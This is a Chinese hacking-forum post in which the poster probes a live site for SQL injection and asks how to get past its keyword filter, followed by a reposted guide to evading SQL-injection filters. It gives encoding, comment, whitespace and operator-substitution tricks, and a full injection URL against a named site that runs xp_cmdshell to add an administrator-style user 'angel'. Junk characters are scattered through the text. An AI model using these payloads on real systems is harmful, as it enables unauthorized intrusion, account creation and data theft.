路过这个网站,检测了一下.6 T" |, u- j( V9 u3 W( f8 X
http://www.xxx.cn/Article.asp?ID=117 and 1=11 `# ~( O4 }' d4 H: t; Y. G
直接返回主页- V/ w5 i+ e! f& K
http://www.xxx.cn/Article.asp?ID=117 or 1=1+ Y( R: l5 T5 L: B, i( K
直接返回主页
. H( }$ a1 a4 ~( E/ ?0 _/ chttp://www.xxx.cn/Article.asp?ID=117 or( N2 c( j+ @6 X( F7 u, f+ x
没有返回主页 没有过滤or% ]. f- c) x: U1 X. B/ n
http://www.xxx.cn/Article.asp?ID=117 and% ]9 B, `- ]* J) q, A: V, c
直接返回主页 看来过滤了and$ h/ e. n; w6 L1 V) M
http://www.xxx.cn/Article.asp?ID=117 or 1* z |: v7 m9 H0 K5 O2 @8 x5 v1 L
没有返回主页 即没有过滤or 也没有过滤1
) C# ?1 S: u# J" uhttp://www.xxx.cn/Article.asp?ID=117 or 1=1+ i; ]$ M: c/ o6 i) }* E6 X
直接返回主页 很明显过滤了等号
! ^7 m/ O8 U n1 B6 H$ j! xor的特性是与and相反的.
5 A8 }3 A- u2 }' e0 H5 R+ Por 1=1 爆错 或与原页面不同% }' C8 G, o8 r
or 1=2 原页面相同$ l, \. T, v# o& h% z2 W9 s' z
这样就是一个注入点
, N8 m. H9 p* h- t但他过滤了=号 我就用><号代替=号吧!
, Q4 W# j/ f" o: [& v6 ror 1<2 很明显是正确的,所以应该与原页面不同
$ g" g4 d7 x2 Y- h) P4 Q3 ior 1>2 很明显是错误的,所以应该与原页面相同/ v! c. v. \+ b& T/ W
然后看看有没有过滤其他的查询语句,比如select.+ L1 O) G9 T1 _9 |8 n* O, b! P
http://www.xxx.cn/Article.asp?ID=117 select
- b9 ?' V9 Y. K1 z( Y% a& N直接返回主页4 v1 Y% z9 {, p( Y/ {
又迷茫了..
+ j6 y) q$ [( j
- w7 X2 w& x, W. {1 ~+ Z+ |. K" ]4 L7 n4 P# U
cookies注入.和以下的方法全都试过了,都失败了.还有什么方法可以饶过吗' p2 G8 |; L D
这个系统我以为是my动力,后台却是这样的http://www.xxx.cn/admin.asp(应该不是假够台吧)
6 O% F4 S" q2 c W/ n% Q/ ]================================================
% h7 w, ]2 u' |* H: l& v' Z以下是转贴:6 c0 L$ b" I' _- c
# F+ c' T8 d: l; W) G2 u突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… 8 T/ K3 r6 g5 i# f' g- F
经过我的收集,大部分的防注入程序都过滤了以下关键字: : x, a7 l9 E4 N2 }5 @
and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =
6 N( V, P* }' h: M$ U, V而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。 ( l% R! x! j+ m# N# A; j. A! p1 |7 B
对于关键字的过滤,以下是我收集的以及我个人的一些想法。
8 P+ Y) Z$ I. B1 u# K( [: @1、运用编码技术绕过 7 L9 \ W, x9 e' R6 g
如URLEncode编码,ASCII编码绕过。例如or 1=1即
4 u5 w& M7 L* X) e0 y; {2 E. i: X, K' w%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。
; W( H. R8 [" r8 C9 }: k! t4 J: R- l0 b4 O7 d+ V
2、通过空格绕过 8 y+ L0 I9 N: a. o+ Q( r! v
如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如
; S, r/ e! j4 b3 K6 b( Bor’ swords’ =‘swords’
! q9 g; y h9 r( p" N,由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。 p6 y& V8 \7 w& N1 s
3、运用字符串判断代替
) F/ n: k. [& H6 A7 U用经典的or 1=1判断绕过,如
, S& J+ E) P1 s# w6 Oor ’swords’ =’swords’ * ]: p! ^! I0 J! e1 t
,这个方法就是网上在讨论的。 1 l& r! c+ h9 D' I
4、通过类型转换修饰符N绕过
% E8 X& w- l( Y0 W可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
" K6 F$ b; r$ j( J9 A( k5、通过+号拆解字符串绕过
, z- V2 }. X) w$ c9 w效果值得考证,但毕竟是一种方法。如 % S' ^* N, A, L+ ~' F. x
or ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ ) 5 ~. ]* Y4 }# Q* k5 a- }* j6 p% N
8 \$ N1 y j0 S" E; o
6、通过LIKE绕过 2 t8 c: A- S* z$ z$ D" C2 s
以前怎么就没想到呢?如or
0 ]4 T5 `! h8 l( ~’swords’ LIKE ’sw’
* c, N8 g; _6 z* v& ?% X!!!显然可以很轻松的绕过 3 V% P. q r4 j. i5 B/ @7 F
“=”“>”
% p7 K1 V. b2 m# @的限制……
* r t0 s* {) W5 V, S" M7、通过IN绕过 ' P+ g% J& V c: Q) T
与上面的LIKE的思路差不多,如 , h8 z5 _) i; g2 u7 }
or ’swords’ IN (’swords’)
3 e7 ^9 D+ U# G( k9 H8 p' w3 G' s7 V, h" j7 `% A% C9 @3 Z% G, O
8、通过BETWEEN绕过 ! U. o) ^+ n4 ^5 y; Z& _
如 6 v1 q |; Q9 |. N
or ’swords’ BETWEEN ’rw’ AND ’tw’
( H0 o- J# o9 [
: R2 f8 W- }! f5 j9、通过>或者<绕过
* Y. e# i' A" s# mor ’swords’ > ’sw’ 2 W3 @0 j0 ^; a( \! [' E5 f
or ’swords’ < ’tw’ $ i, e# r' I* [( h3 [. \
or 1<3 " f9 r5 Z# w5 L" e# l3 t1 R
…… L$ k, f) x/ l u7 K5 `* Y
10、运用注释语句绕过 , h+ z6 {; N* \2 P
用/**/代替空格,如:
. v$ \' h! l* d0 a3 BUNION /**/ Select /**/user,pwd,from tbluser . t7 ^, Z9 z4 s* e0 M$ ]
( I/ P) s, ^# x: G
用/**/分割敏感词,如:
. S. ]; M& K& A wU/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser 3 o* m% S: K4 O- n
, y. S% D, i) Q$ A- F1 U. L11、用HEX绕过,一般的IDS都无法检测出来 [9 d! X* X, p1 T
0x730079007300610064006D0069006E00 =hex(sysadmin) . E) H, e6 l) S# d( b
0x640062005F006F0077006E0065007200 =hex(db_owner)
3 q1 l. [4 D+ S! G1 S另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下: % s# h- D8 d4 e: y
declare @a sysname
v7 S. T( \$ T3 u8 W- @3 I4 r select @a=
# R) h6 O9 a7 ]2 O5 t exec master.dbo.xp_cmdshell @a
) s4 w8 u, c' l2 @* v效果
, H) {. }* n9 R) ?; Fhttp://www.ilikeplmm.com/show.asp?id=1;declare%20@a% [email=20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a]20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a[/email];-- 0 r, Q |- E% T/ [
# |* q& q/ d: ^; p2 e5 n1 n; ~0 k其中的
3 B$ J$ t& Y ]* P6 R- C& ~$ t9 G0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 1 C& T/ M# ?+ s1 z3 k
就是 9 q+ |4 i' `1 z7 q k7 j
“net user angel pass /add” B$ a7 c3 v! ^( S, u, m3 F
* s3 G7 l1 I1 O; V2 `+ L0 m3 y$ N
一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。
8 c6 u: q8 a5 G引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。* s) G. \( z+ q8 u8 @
另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似
: L; p& h7 a5 C' J0 ?) `Copy code
% l- J7 P8 J& n; F6 eselect * from table exec xp_cmdshell'xxxxxxxxxx'
; ]4 Q5 o7 P! L" I3 k
1 j5 x7 _9 H8 L+ p# k) S1 i* [( z0 D
5 ~* T3 Z' i& m, K# c; ^) x: X/ v9 wselect * from table/**/exec xp_cmdshell'xxxxxxxxxx'( Z+ D( b1 Q: v! i0 _
R' }9 L3 d+ z* Q2 t% y/ ^
1 f7 G5 A) d' L8 qselect * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'# P- K, ]' B, G; ~
1 C3 e7 Z$ E2 v5 |8 b! t/ [
1 z+ y' p. {! c* x. H7 R% Sselect * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'+ d2 ^& b _& |5 r) S# H% j3 h
' E5 v% p7 X( U k9 d) \+ K的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧?5 |$ R3 c' I4 Y% S, h& _
% P' r% Y% z& A$ i7 ]
这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了9 Z. x: Z" m. u$ [( {0 f( X m
可能大家早就知道了,不管怎么说,发在这里吧!& {4 m3 w$ P3 |- O# \- {# B
$ h# A4 d! U3 x8 Q最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。
6 T0 d' ?' O/ A3 G# J. x: N9 ? y! i& C3 @6 u- L K
8 [, K/ d5 Y. l. e
$ k9 h5 A1 C0 ^( s2 N O: W" }对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,
0 |) L. n& I r5 R; h. y比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧? , r! m5 p3 p( E: Y' s9 k4 \
$ w. } U# I! O
|
发表于 2012-9-15 14:47:46
收藏
支持
反对